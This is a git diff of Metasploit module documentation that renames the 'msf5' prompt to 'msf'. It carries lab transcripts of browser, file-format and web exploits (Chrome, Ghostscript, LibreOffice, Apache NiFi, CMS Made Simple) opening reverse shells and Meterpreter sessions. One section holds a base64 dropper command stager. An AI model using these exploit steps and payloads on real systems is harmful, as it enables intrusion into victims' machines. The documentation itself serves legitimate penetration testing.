diff --git a/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md b/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md index 631bb6c20d..09b1ae6b2e 100644 --- a/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md +++ b/documentation/modules/exploit/multi/browser/chrome_simplifiedlowering_overflow.md 
@@ -37,29 +37,29 @@ Start Google Chrome without a sandbox, e.g: `"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox` ``` -msf5 > use exploit/multi/browser/chrome_simplifiedlowering_overflow +msf > use exploit/multi/browser/chrome_simplifiedlowering_overflow [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvport 80 srvport => 80 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath / +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set uripath / uripath => / -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 127.0.0.1 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set srvhost 127.0.0.1 srvhost => 127.0.0.1 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost 127.0.0.1 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > set lhost 127.0.0.1 lhost => 127.0.0.1 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > run +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress? [*] Started reverse TCP handler on 127.0.0.1:4444 -msf5 exploit(multi/browser/chrome) > [*] Using URL: http://127.0.0.1:80/ +msf exploit(multi/browser/chrome) > [*] Using URL: http://127.0.0.1:80/ [*] Server started. 
[*] 127.0.0.1 chrome_simplifiedlowering_overflow - Sending /index.html to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 [*] Sending stage (3012516 bytes) to 127.0.0.1 [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:44046) at 2021-04-06 16:33:05 +0530 -msf5 exploit(multi/browser/chrome_simplifiedlowering_overflow) > sessions -i 1 +msf exploit(multi/browser/chrome_simplifiedlowering_overflow) > sessions -i 1 [*] Starting interaction with 1... meterpreter > diff --git a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md index b37b55b3dd..98bb8158f5 100644 --- a/documentation/modules/exploit/multi/browser/msfd_rce_browser.md +++ b/documentation/modules/exploit/multi/browser/msfd_rce_browser.md 
@@ -67,19 +67,19 @@ Options unique for this module is described below. ### Through the victim's browser ``` - msf5 > use exploit/multi/browser/msfd_rce_browser - msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp + msf > use exploit/multi/browser/msfd_rce_browser + msf exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp payload => ruby/shell_reverse_tcp - msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17 + msf exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17 lhost => 192.168.0.17 - msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443 + msf exploit(multi/browser/msfd_rce_browser) > set lport 443 lport => 443 - msf5 exploit(multi/browser/msfd_rce_browser) > exploit + msf exploit(multi/browser/msfd_rce_browser) > exploit [*] Exploit running as background job 0. [-] Handler failed to bind to 192.168.0.17:443:- - [*] Started reverse TCP handler on 0.0.0.0:443 - msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL: + msf exploit(multi/browser/msfd_rce_browser) > [*] Using URL: http://0.0.0.0:8080/J5ras6oYftFWW4 [*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4 [*] Server started. diff --git a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md index c3fbd3b531..e7b0b70b1d 100644 --- a/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md +++ b/documentation/modules/exploit/multi/fileformat/evince_cbt_cmd_injection.md 
@@ -43,24 +43,24 @@ ## Scenarios ``` - msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash + msf > use exploit/multi/fileformat/evince_cbt_cmd_injection + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash payload => cmd/unix/reverse_bash - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188 + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > run [*] Writing file: msf.cbt (1078272 bytes) ... [+] msf.cbt stored at /root/.msf4/local/msf.cbt - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www [*] exec: mv /root/.msf4/local/msf.cbt /var/www - msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler - msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash + msf exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler + msf exploit(multi/handler) > set payload cmd/unix/reverse_bash payload => cmd/unix/reverse_bash - msf5 exploit(multi/handler) > set lhost 172.16.191.188 + msf exploit(multi/handler) > set lhost 172.16.191.188 lhost => 172.16.191.188 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 172.16.191.188:4444 [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500 diff --git a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md index 205229820b..039338515f 100644 
--- a/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md +++ b/documentation/modules/exploit/multi/fileformat/ghostscript_failed_restore.md 
@@ -43,20 +43,20 @@ Set this to a writable directory without `noexec`. ## Usage ``` -msf5 > use exploit/multi/fileformat/ghostscript_failed_restore -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set target Linux (Dropper) +msf > use exploit/multi/fileformat/ghostscript_failed_restore +msf exploit(multi/fileformat/ghostscript_failed_restore) > set target Linux (Dropper) target => Linux (Dropper) -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set payload linux/x64/meterpreter/reverse_tcp +msf exploit(multi/fileformat/ghostscript_failed_restore) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set lhost 172.28.128.1 +msf exploit(multi/fileformat/ghostscript_failed_restore) > set lhost 172.28.128.1 lhost => 172.28.128.1 -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set disablepayloadhandler false +msf exploit(multi/fileformat/ghostscript_failed_restore) > set disablepayloadhandler false disablepayloadhandler => false -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set wfsdelay 3600 +msf exploit(multi/fileformat/ghostscript_failed_restore) > set wfsdelay 3600 wfsdelay => 3600 -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > set verbose true +msf exploit(multi/fileformat/ghostscript_failed_restore) > set verbose true verbose => true -msf5 exploit(multi/fileformat/ghostscript_failed_restore) > run +msf exploit(multi/fileformat/ghostscript_failed_restore) > run [*] Started reverse TCP handler on 172.28.128.1:4444 [*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/hvQlm.b64' ; 
((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tgxVT' < '/tmp/hvQlm.b64' ; chmod +x '/tmp/tgxVT' ; '/tmp/tgxVT' ; rm -f '/tmp/tgxVT' ; rm -f '/tmp/hvQlm.b64'"] diff --git a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md index e92fcb7c77..bf6e4b05f1 100644 --- a/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md +++ b/documentation/modules/exploit/multi/fileformat/libreoffice_logo_exec.md @@ -50,7 +50,7 @@ ### LibreOffice 6.2.5 on Windows 10 ``` - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.4:4444 [*] Sending stage (53755 bytes) to 192.168.56.3 @@ -66,7 +66,7 @@ ### LibreOffice 6.2.5 on Ubuntu 18.04 ``` - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (53755 bytes) to 192.168.37.137 @@ -83,9 +83,9 @@ ### LibreOffice 6.2.5 on macOS 10.13.6 ``` - msf5 exploit(multi/handler) > set payload python/meterpreter/reverse_tcp + msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp payload => python/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.4:4444 [*] Sending stage (53755 bytes) to 192.168.56.2 diff --git a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md index 8b9ecdcd00..4a0df2a020 100644 --- a/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md 
+++ b/documentation/modules/exploit/multi/fileformat/libreoffice_macro_exec.md @@ -36,18 +36,18 @@ ### Tested on LibreOffice 6.1.2.1 running Windows 7 ``` - msf5 > use exploit/multi/fileformat/libreoffice_macro_exec - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 + msf > use exploit/multi/fileformat/libreoffice_macro_exec + msf exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run + msf exploit(multi/fileformat/libreoffice_macro_exec) > run [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler - msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp + msf exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler + msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set lhost 192.168.37.1 + msf exploit(multi/handler) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (179779 bytes) to 192.168.37.156 
@@ -68,20 +68,20 @@ ### Tested on LibreOffice 6.1.0.1 running Ubuntu 18.04 ``` - msf5 > use exploit/multi/fileformat/libreoffice_macro_exec - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set target 1 + msf > use exploit/multi/fileformat/libreoffice_macro_exec + msf exploit(multi/fileformat/libreoffice_macro_exec) > set target 1 target => 1 - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 + msf exploit(multi/fileformat/libreoffice_macro_exec) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > run + msf exploit(multi/fileformat/libreoffice_macro_exec) > run [+] librefile.odt stored at /Users/space/.msf4/local/librefile.odt - msf5 exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler - msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp + msf exploit(multi/fileformat/libreoffice_macro_exec) > use multi/handler + msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp - msf5 exploit(multi/handler) > set LHOST 192.168.37.1 + msf exploit(multi/handler) > set LHOST 192.168.37.1 LHOST => 192.168.37.1 - msf5 exploit(multi/handler) > run + msf exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [*] Sending stage (985320 bytes) to 192.168.37.174 diff --git a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md index 21b07b8958..f76900285f 100644 --- a/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md +++ b/documentation/modules/exploit/multi/http/agent_tesla_panel_rce.md 
@@ -133,12 +133,12 @@ The Agent Tesla CnC username to authenticate with (needed for authenticated RCE ### WebPanel1.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 5.6.40, Apache 2.4.41, MariaDB 10.4.10 ``` -msf5 > use exploit/multi/http/agent_tesla_panel_rce -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 +msf > use exploit/multi/http/agent_tesla_panel_rce +msf exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 +msf exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 -msf5 exploit(multi/http/agent_tesla_panel_rce) > show options +msf exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): @@ -169,11 +169,11 @@ Exploit target: 0 Automatic (PHP-Dropper) -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 6633 +msf exploit(multi/http/agent_tesla_panel_rce) > set LPORT 6633 LPORT => 6633 -msf5 exploit(multi/http/agent_tesla_panel_rce) > check +msf exploit(multi/http/agent_tesla_panel_rce) > check [+] 169.254.162.16:80 - The target is vulnerable. -msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit +msf exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:6633 [*] Executing automatic check (disable AutoCheck to override) 
@@ -215,16 +215,16 @@ meterpreter > ### WebPanel2.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10 ``` -msf5 > use exploit/multi/http/agent_tesla_panel_rce -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 +msf > use exploit/multi/http/agent_tesla_panel_rce +msf exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test +msf exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test USERNAME => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test +msf exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test PASSWORD => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 +msf exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 -msf5 exploit(multi/http/agent_tesla_panel_rce) > show options +msf exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): @@ -255,7 +255,7 @@ Exploit target: 0 Automatic (PHP-Dropper) -msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit +msf exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:4444 [*] Executing automatic check (disable AutoCheck to override) @@ -296,8 +296,8 @@ meterpreter > ### WebPanel3.7z on Windows 10 x64 19H2 with WAMP 3.2.2.2 x64, PHP 7.3.12, Apache 2.4.41, MariaDB 10.4.10 ``` -msf5 > use exploit/multi/http/agent_tesla_panel_rce -msf5 exploit(multi/http/agent_tesla_panel_rce) > show options +msf > use exploit/multi/http/agent_tesla_panel_rce +msf exploit(multi/http/agent_tesla_panel_rce) > show options Module options (exploit/multi/http/agent_tesla_panel_rce): 
@@ -328,17 +328,17 @@ Exploit target: 0 Automatic (PHP-Dropper) -msf5 exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 +msf exploit(multi/http/agent_tesla_panel_rce) > set RHOSTS 169.254.162.16 RHOSTS => 169.254.162.16 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 +msf exploit(multi/http/agent_tesla_panel_rce) > set LHOST 169.254.115.5 LHOST => 169.254.115.5 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set LPORT 5566 +msf exploit(multi/http/agent_tesla_panel_rce) > set LPORT 5566 LPORT => 5566 -msf5 exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test +msf exploit(multi/http/agent_tesla_panel_rce) > set USERNAME test USERNAME => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test +msf exploit(multi/http/agent_tesla_panel_rce) > set PASSWORD test PASSWORD => test -msf5 exploit(multi/http/agent_tesla_panel_rce) > exploit +msf exploit(multi/http/agent_tesla_panel_rce) > exploit [*] Started reverse TCP handler on 169.254.115.5:5566 [*] Executing automatic check (disable AutoCheck to override) diff --git a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md index 4bb282125b..24defbd7a0 100644 --- a/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md +++ b/documentation/modules/exploit/multi/http/apache_nifi_processor_rce.md 
@@ -164,22 +164,22 @@ The version of NiFi that was installed on both platforms was 1.12.1. ``` $ msfconsole -q -msf5 exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce +msf exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce [*] Using configured payload cmd/unix/reverse_bash -msf5 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 +msf exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 lhost => 192.168.194.131 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set target 1 +msf exploit(multi/http/apache_nifi_processor_rce) > set target 1 target => 1 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set rhost 192.168.194.140 +msf exploit(multi/http/apache_nifi_processor_rce) > set rhost 192.168.194.140 rhost => 192.168.194.140 -msf5 exploit(multi/http/apache_nifi_processor_rce) > check +msf exploit(multi/http/apache_nifi_processor_rce) > check [*] 192.168.194.140:8080 - The target appears to be vulnerable. -msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z +msf exploit(multi/http/apache_nifi_processor_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Waiting 5 seconds before stopping and deleting [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.140:50008) at 2020-10-03 13:17:58 +0100 [*] Session 1 created in the background. -msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions +msf exploit(multi/http/apache_nifi_processor_rce) > sessions Active sessions =============== 
@@ -195,33 +195,33 @@ It can be seen that it fails the first time because authentication is required, ``` $ msfconsole -q -msf5 exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce +msf exploit(multi/http/apache_nifi_processor_rce) > use multi/http/apache_nifi_processor_rce [*] Using configured payload cmd/unix/reverse_bash -msf5 exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 +msf exploit(multi/http/apache_nifi_processor_rce) > set lhost 192.168.194.131 lhost => 192.168.194.131 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set rhost 127.0.0.1 +msf exploit(multi/http/apache_nifi_processor_rce) > set rhost 127.0.0.1 rhost => 127.0.0.1 -msf5 exploit(multi/http/apache_nifi_processor_rce) > set ssl true +msf exploit(multi/http/apache_nifi_processor_rce) > set ssl true [!] Changing the SSL option's value may require changing RPORT! ssl => true -msf5 exploit(multi/http/apache_nifi_processor_rce) > set rport 9443 +msf exploit(multi/http/apache_nifi_processor_rce) > set rport 9443 rport => 9443 -msf5 exploit(multi/http/apache_nifi_processor_rce) > check +msf exploit(multi/http/apache_nifi_processor_rce) > check [*] 127.0.0.1:9443 - The service is running, but could not be validated. -msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z +msf exploit(multi/http/apache_nifi_processor_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [-] Exploit aborted due to failure: bad-config: Authentication is required. Bearer-Token or Username and Password must be specified [*] Exploit completed, but no session was created. 
-msf5 exploit(multi/http/apache_nifi_processor_rce) > set username admin +msf exploit(multi/http/apache_nifi_processor_rce) > set username admin username => admin -msf5 exploit(multi/http/apache_nifi_processor_rce) > set password admin +msf exploit(multi/http/apache_nifi_processor_rce) > set password admin password => admin -msf5 exploit(multi/http/apache_nifi_processor_rce) > run -z +msf exploit(multi/http/apache_nifi_processor_rce) > run -z [*] Started reverse TCP handler on 192.168.194.131:4444 [*] Waiting 5 seconds before stopping and deleting [*] Command shell session 1 opened (192.168.194.131:4444 -> 192.168.194.130:50802) at 2020-10-03 13:18:00 +0100 [*] Session 1 created in the background. -msf5 exploit(multi/http/apache_nifi_processor_rce) > sessions +msf exploit(multi/http/apache_nifi_processor_rce) > sessions Active sessions =============== diff --git a/documentation/modules/exploit/multi/http/atutor_upload_traversal.md b/documentation/modules/exploit/multi/http/atutor_upload_traversal.md index 1792a63dd1..571b1585fd 100644 --- a/documentation/modules/exploit/multi/http/atutor_upload_traversal.md +++ b/documentation/modules/exploit/multi/http/atutor_upload_traversal.md @@ -74,7 +74,7 @@ if exploitation via the `Import New Language` function succeeded. The default va ## Scenarios ### ATutor 2.2.4 running on Windows 10 (XAMPP) ``` -msf5 exploit(multi/http/atutor_upload_traversal) > show options +msf exploit(multi/http/atutor_upload_traversal) > show options Module options (exploit/multi/http/atutor_upload_traversal): @@ -111,7 +111,7 @@ Exploit target: 0 Auto -msf5 exploit(multi/http/atutor_upload_traversal) > run +msf exploit(multi/http/atutor_upload_traversal) > run [*] Started reverse TCP handler on 192.168.1.28:4444 [+] Successfully authenticated as user 'root'. We have admin privileges! 
diff --git a/documentation/modules/exploit/multi/http/baldr_upload_exec.md b/documentation/modules/exploit/multi/http/baldr_upload_exec.md index ade572b71f..f2e8ff0cca 100644 --- a/documentation/modules/exploit/multi/http/baldr_upload_exec.md +++ b/documentation/modules/exploit/multi/http/baldr_upload_exec.md @@ -31,10 +31,10 @@ The URI where the Baldr panel/gateway is located on the target web server. ## Scenarios ``` -msf5 > use exploit/multi/http/baldr_upload_exec -msf5 exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27 +msf > use exploit/multi/http/baldr_upload_exec +msf exploit(exploit/multi/http/baldr_upload_exec) > set rhost 192.168.1.27 rhost => 192.168.1.27 -msf5 exploit(multi/http/baldr_upload_exec) > run +msf exploit(multi/http/baldr_upload_exec) > run [*] Baldr Version: <= v2.0 [+] Payload uploaded to /logs/FJETBHLL/.vatw.php diff --git a/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md b/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md index 6fc679448b..b18b34a15a 100644 --- a/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md +++ b/documentation/modules/exploit/multi/http/cmsms_object_injection_rce.md 
@@ -33,18 +33,18 @@ Affecting CMS Made Simple, version 2.2.6, 2.2.7, 2.2.8, 2.2.9, 2.2.9.1 ### Tested on CMS Made Simple (CMSMS) 2.2.8 ``` -msf5 > use exploit/multi/http/cmsms_object_injection_rce -msf5 exploit(multi/http/cmsms_object_injection_rce) > set rhosts target.com +msf > use exploit/multi/http/cmsms_object_injection_rce +msf exploit(multi/http/cmsms_object_injection_rce) > set rhosts target.com rhosts => target.com -msf5 exploit(multi/http/cmsms_object_injection_rce) > check +msf exploit(multi/http/cmsms_object_injection_rce) > check [*] 192.168.1.64:80 - The target appears to be vulnerable. -msf5 exploit(multi/http/cmsms_object_injection_rce) > set username daniele +msf exploit(multi/http/cmsms_object_injection_rce) > set username daniele username => daniele -msf5 exploit(multi/http/cmsms_object_injection_rce) > set password qwerty +msf exploit(multi/http/cmsms_object_injection_rce) > set password qwerty password => qwerty -msf5 exploit(multi/http/cmsms_object_injection_rce) > set targeturi /cmsms/ +msf exploit(multi/http/cmsms_object_injection_rce) > set targeturi /cmsms/ targeturi => /cmsms/ -msf5 exploit(multi/http/cmsms_object_injection_rce) > exploit +msf exploit(multi/http/cmsms_object_injection_rce) > exploit [*] Started reverse TCP handler on 192.168.1.64:4444 [*] Sending stage (38247 bytes) to 192.168.1.64 @@ -57,5 +57,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.1.64 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/cmsms_object_injection_rce) > +msf exploit(multi/http/cmsms_object_injection_rce) > ``` diff --git a/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md b/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md index 9a46a406c4..a2ebb149f0 100644 --- a/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md +++ b/documentation/modules/exploit/multi/http/cmsms_showtime2_rce.md 
@@ -39,18 +39,18 @@ Affecting Showtime2 CMS Made Simple (CMSMS) module, version 3.6.2, 3.6.1, 3.6.0, ### Tested on Showtime 3.6.2 on CMS Made Simple (CMMS) 2.2.10 ``` -msf5 > use exploit/multi/http/cmsms_showtime2_rce -msf5 exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com +msf > use exploit/multi/http/cmsms_showtime2_rce +msf exploit(multi/http/cmsms_showtime2_rce) > set rhost target.com rhost => target.com -msf5 exploit(multi/http/cmsms_showtime2_rce) > check +msf exploit(multi/http/cmsms_showtime2_rce) > check [*] Showtime2 version: 3.6.2 [*] 192.168.2.59:80 - The target appears to be vulnerable. -msf5 exploit(multi/http/cmsms_showtime2_rce) > set username Designer +msf exploit(multi/http/cmsms_showtime2_rce) > set username Designer username => Designer -msf5 exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r +msf exploit(multi/http/cmsms_showtime2_rce) > set password d3s1gn3r password => d3s1gn3r -msf5 exploit(multi/http/cmsms_showtime2_rce) > exploit +msf exploit(multi/http/cmsms_showtime2_rce) > exploit [*] Started reverse TCP handler on 10.0.8.2:4444 [*] Showtime2 version: 3.6.2 @@ -66,5 +66,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/cmsms_showtime2_rce) > +msf exploit(multi/http/cmsms_showtime2_rce) > ``` diff --git a/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md b/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md index c292490032..b209ddb8f1 100644 --- a/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md +++ b/documentation/modules/exploit/multi/http/cmsms_upload_rename_rce.md 
@@ -25,14 +25,14 @@ ### CMS Made Simple v2.2.5 on Ubuntu 18.04 (PHP 7.2.7, Apache 2.4.9) ``` -msf5 > use exploit/multi/http/cmsms_upload_rename_rce -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev +msf > use exploit/multi/http/cmsms_upload_rename_rce +msf exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev username => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev +msf exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev password => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123 +msf exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.123 rhosts => 172.22.222.123 -msf5 exploit(multi/http/cmsms_upload_rename_rce) > run +msf exploit(multi/http/cmsms_upload_rename_rce) > run [*] Started reverse TCP handler on 172.22.222.194:4444 [*] Sending stage (37775 bytes) to 172.22.222.123 @@ -48,14 +48,14 @@ meterpreter > ### CMS Made Simple v2.2.5 on Windows 10 x64 (PHP 5.6.35, Apache 2.4.33) ``` -msf5 > use exploit/multi/http/cmsms_upload_rename_rce -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev +msf > use exploit/multi/http/cmsms_upload_rename_rce +msf exploit(multi/http/cmsms_upload_rename_rce) > set username msfdev username => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev +msf exploit(multi/http/cmsms_upload_rename_rce) > set password msfdev password => msfdev -msf5 exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175 +msf exploit(multi/http/cmsms_upload_rename_rce) > set rhosts 172.22.222.175 rhosts => 172.22.222.175 -msf5 exploit(multi/http/cmsms_upload_rename_rce) > 